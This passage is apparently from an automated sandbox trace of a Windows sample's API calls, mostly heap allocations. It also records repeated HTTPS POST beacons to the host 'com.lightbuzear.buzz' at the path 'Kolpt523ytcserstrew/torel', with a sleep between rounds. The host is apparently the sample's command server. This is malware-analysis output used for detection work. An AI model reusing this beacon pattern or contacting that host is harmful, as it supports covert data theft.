returned 0x71570000 [0226.065] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815770 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157e8 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815770 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157e8 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48302f0 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0226.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48302f0 | out: hHeap=0x4780000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482fff8 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0226.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48301b0 [0226.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0226.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0226.068] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0226.068] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0226.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48301b0 | out: hHeap=0x4780000) returned 1 [0226.069] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48156c8 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156c8 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830318 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0226.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830318 | out: hHeap=0x4780000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48302f0 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0226.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303b8 [0226.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0226.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0226.070] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0226.070] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0226.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303b8 | out: hHeap=0x4780000) returned 1 [0226.071] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0226.071] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0226.071] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0226.072] FreeLibrary (hLibModule=0x71570000) returned 1 [0226.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0226.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0226.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0226.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0226.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0226.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0226.081] Sleep (dwMilliseconds=0x2710) [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0226.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0226.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0226.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0226.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157a0 [0226.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815680 [0226.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157a0 | out: hHeap=0x4780000) returned 1 [0226.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0226.092] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815680 | out: hHeap=0x4780000) returned 1 [0226.092] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48156c8 [0226.092] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0226.092] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0226.092] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0226.092] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0226.092] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0226.092] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0226.092] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156e0 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815548 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156e0 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815548 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830db8 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0226.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0226.093] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0226.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0226.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0226.094] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0226.094] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0226.094] FreeLibrary (hLibModule=0x71780000) returned 1 [0226.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0226.095] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0226.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0226.095] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0226.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0226.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0226.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0226.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0226.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0226.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0226.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0226.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0226.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0226.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0226.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0226.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815758 [0226.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0226.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0226.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815758 | out: hHeap=0x4780000) returned 1 [0226.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815548 [0226.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830390 [0226.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830390 | out: hHeap=0x4780000) returned 1 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300c0 [0226.097] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830048 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815728 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815608 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815728 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0226.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815668 [0226.097] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830110 [0226.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830110 | out: hHeap=0x4780000) returned 1 [0226.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0226.098] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815680 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48156f8 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815680 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156f8 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48301b0 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0226.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48301b0 | out: hHeap=0x4780000) returned 1 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830098 [0226.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0226.100] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830020 [0226.100] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0226.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0226.101] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0226.101] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0226.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830020 | out: hHeap=0x4780000) returned 1 [0226.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156e0 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815728 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156e0 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815728 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830340 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0226.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830340 | out: hHeap=0x4780000) returned 1 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48301b0 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0226.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830278 [0226.103] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0226.103] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0226.103] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0226.103] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0227.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830278 | out: hHeap=0x4780000) returned 1 [0227.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0227.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0227.554] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0227.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0227.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0227.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0227.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815698 [0227.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815680 [0227.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815698 | out: hHeap=0x4780000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0227.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815680 | out: hHeap=0x4780000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48300e8 [0227.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0227.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48300e8 | out: hHeap=0x4780000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830020 [0227.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0227.555] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48300e8 [0227.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0227.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0227.556] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0227.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, 